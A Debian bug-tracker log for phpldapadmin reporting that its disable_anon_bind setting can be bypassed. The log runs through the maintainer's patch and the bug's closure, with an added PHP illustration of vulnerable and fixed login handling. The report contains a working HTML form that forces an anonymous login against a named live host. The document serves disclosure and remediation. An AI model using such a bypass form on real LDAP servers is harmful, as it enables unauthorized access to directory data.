Acknowledgement sent to Alexander Gerasiov <gq@cs.msu.su>:
New Bug report received and forwarded. Copy sent to Fabio Tranchitella <kobold@debian.org>.
Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security
Even if you deny anonymous login with disable_anon_bind, anyone could
access your LDAP server.
As I can see, this option only hides the checkbox on the input page, but
anyone can create a workaround hack:
==========example form to log into eol.lvk.cs.msu.su========
<html><body>
<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php"
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>
</body></html>
=============================================================
I think that the version in sarge is also vulnerable to this trick.
-- System Information:
Debian Release: 3.1
APT prefers testing
APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)
Versions of packages phpldapadmin depends on:
ii apache [httpd] 1.3.33-6 versatile, high-performance HTTP s
ii debconf 1.4.30.13 Debian configuration management sy
ii php4 4:4.3.10-15 server-side, HTML-embedded scripti
ii php4-cgi 4:4.3.10-15 server-side, HTML-embedded scripti
ii php4-ldap 4:4.3.10-15 LDAP module for php4
-- debconf information:
phpldapadmin/ldap-bindpw: secret
phpldapadmin/ldap-tls: false
phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie
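The report above describes a client-side-only control: the option suppresses the checkbox, but the login handler still honours whatever `anonymous_bind` value is posted. The following is an added illustration, not phpldapadmin's own code: a minimal model of that login decision, with the trusting variant beside one that enforces disable_anon_bind on the server. The config key and the POST field names come from the report; the function names, the `$servers` array and the `login_dn`/`login_pass` fields are hypothetical.

```php
<?php
// Added illustration (hypothetical structure, not phpldapadmin's code).
// Constructed server configuration: anonymous binds are disabled for server 0.
$servers = [
    0 => ['host' => 'ldap.example.invalid', 'disable_anon_bind' => true],
];

// Vulnerable variant: disable_anon_bind only decided whether the checkbox was
// rendered; the handler still trusts the posted anonymous_bind field.
function resolve_bind_vulnerable(array $servers, array $post): array {
    if (!empty($post['anonymous_bind'])) {
        return ['dn' => '', 'pass' => '', 'anonymous' => true];
    }
    return ['dn' => $post['login_dn'] ?? '', 'pass' => $post['login_pass'] ?? '', 'anonymous' => false];
}

// Fixed variant: the policy is checked server-side against the configuration,
// regardless of what the client posted (a hidden form control is not access control).
function resolve_bind_fixed(array $servers, array $post): array {
    $srv = $servers[(int) ($post['server_id'] ?? -1)] ?? null;
    if ($srv === null) {
        throw new RuntimeException('unknown server_id');
    }
    $wants_anon = !empty($post['anonymous_bind']);
    if ($wants_anon && $srv['disable_anon_bind']) {
        throw new RuntimeException('anonymous bind is disabled for this server');
    }
    if ($wants_anon) {
        return ['dn' => '', 'pass' => '', 'anonymous' => true];
    }
    $dn   = trim((string) ($post['login_dn'] ?? ''));
    $pass = (string) ($post['login_pass'] ?? '');
    // An empty DN or empty password is itself an anonymous / unauthenticated
    // bind in LDAP (RFC 4513), so it must be refused when anonymous bind is off.
    if ($dn === '' || $pass === '') {
        throw new RuntimeException('credentials required');
    }
    return ['dn' => $dn, 'pass' => $pass, 'anonymous' => false];
}

// The crafted request from the report: server_id=0 with anonymous_bind checked.
$crafted = ['server_id' => '0', 'anonymous_bind' => 'on'];
// The trusting handler hands back an anonymous bind despite the configuration.
var_dump(resolve_bind_vulnerable($servers, $crafted));
// The enforcing handler refuses it.
try {
    resolve_bind_fixed($servers, $crafted);
} catch (RuntimeException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

The same principle applies to any other form field that selects a privilege level: derive it from server-side configuration and the authenticated session, never from the submitted form alone.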
Information forwarded to debian-bugs-dist@lists.debian.org: Bug#322423; Package phpldapadmin.
Acknowledgement sent to Fabio Tranchitella <kobold@debian.org>:
Extra info received and forwarded to list.
On Wed, 10/08/2005 at 19.35 +0400, Alexander Gerasiov
wrote:
> Package: phpldapadmin
> Version: 0.9.6c-4
> Severity: critical
> Tags: security
>
> Even if you deny anonymous login with disable_anon_bind, anyone could
> access your LDAP server.
>
> As I can see, this option only hides the checkbox on the input page, but
> anyone can create a workaround hack:
Thanks for pointing this out.
I'm preparing a patch and a new package for this, it will be ready in a
few hours.
--
Fabio Tranchitella <kobold@debian.org>
Proud Debian GNU/Linux developer, admin and user.
http://people.debian.org/~kobold/
_____________________________________________________________________
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564
Subject: Bug#322423: fixed in phpldapadmin 0.9.6c-5
Date: Wed, 10 Aug 2005 10:32:17 -0700
Source: phpldapadmin
Source-Version: 0.9.6c-5
We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:
phpldapadmin_0.9.6c-5.diff.gz
to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.diff.gz
phpldapadmin_0.9.6c-5.dsc
to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.dsc
phpldapadmin_0.9.6c-5_all.deb
to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 322423@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Fabio Tranchitella <kobold@debian.org> (supplier of updated phpldapadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
Format: 1.7
Date: Wed, 10 Aug 2005 17:14:01 +0000
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 0.9.6c-5
Distribution: unstable
Urgency: high
Maintainer: Fabio Tranchitella <kobold@debian.org>
Changed-By: Fabio Tranchitella <kobold@debian.org>
Description:
phpldapadmin - web based interface for administering LDAP servers
Closes: 322423
Changes:
phpldapadmin (0.9.6c-5) unstable; urgency=high
.
* debian/control: added build-deps on dpatch.
* debian/patches/login.dpatch: really block anonymous login when disabled
by config files. (Closes: #322423)
Files:
59bd6b27ce9498c9c4408a36dcdbb388 617 admin extra phpldapadmin_0.9.6c-5.dsc
a4e84ec8e644aa65d2b735f87ee734d6 13449 admin extra phpldapadmin_0.9.6c-5.diff.gz
20d8733a521b99277a526caf61bc9c57 714834 admin extra phpldapadmin_0.9.6c-5_all.deb
Severity set to `grave'.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 24 Jun 2007 21:41:03 GMT)